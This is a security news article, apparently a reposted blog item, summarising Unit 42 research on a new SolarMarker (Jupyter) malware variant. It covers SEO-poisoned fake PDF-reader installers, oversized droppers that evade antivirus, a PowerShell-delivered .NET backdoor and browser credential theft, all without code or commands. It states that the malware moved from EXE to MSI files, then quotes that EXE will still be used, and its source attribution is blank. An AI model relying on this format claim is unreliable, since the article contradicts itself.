This new SolarMarker variant uses updated techniques to stay undetected

Security researchers have revealed a new version of the SolarMarker malware that updates its defense evasion abilities to stay under the radar.

Researchers from Palo Alto Networks Unit 42 wrote in a report published this month that the latest version demonstrated an evolution from Windows Portable Executables (EXE files) to Windows Installer Package files (MSI files).”This campaign is still under development and will be using executable files (EXE) as in its earlier versions.”

As its primary vector of infection, SolarMarker, also known as Jupyter, uses manipulated search engine optimization tactics.This malware is known for its information-stealing and backdoor features, which enable the attackers to steal data stored in web browsers and execute arbitrary commands retrieved from a remote server.

In February 2022, the operators of SolarMarker were observed using stealthy Windows Registry tricks to establish long-term persistence on compromised systems.

SolarMarker Malware

The evolving attack patterns spotted by Unit 42 are a continuation of this behavior, what with the infection chains taking the form of 250MB executables for PDF readers and utilities that are hosted on fraudulent websites packed with keywords and use SEO techniques to rank them higher in the search results.

The large file size not only allows the initial stage dropper to avoid automated analysis by antivirus engines, it’s also designed to download and install the legitimate program while, in the background, it activates the execution of a PowerShell installer that deploys the SolarMarker malware.

SolarMarker Malware

A .NET-based payload, the SolarMarker backdoor is equipped with capabilities to conduct internal reconnaissance and vacuum system metadata, all of which is exfiltrated to the remote server over an encrypted channel.

The implant also functions as a conduit to deploy the SolarMarker’s information-stealing module on the victim machine. The stealer, for its part, can siphon autofill data, cookies, passwords, and credit card information from web browsers.

“The malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts,” the researchers said.

Some sections of this post are sourced from:

Add a Comment

Your email address will not be published. Required fields are marked *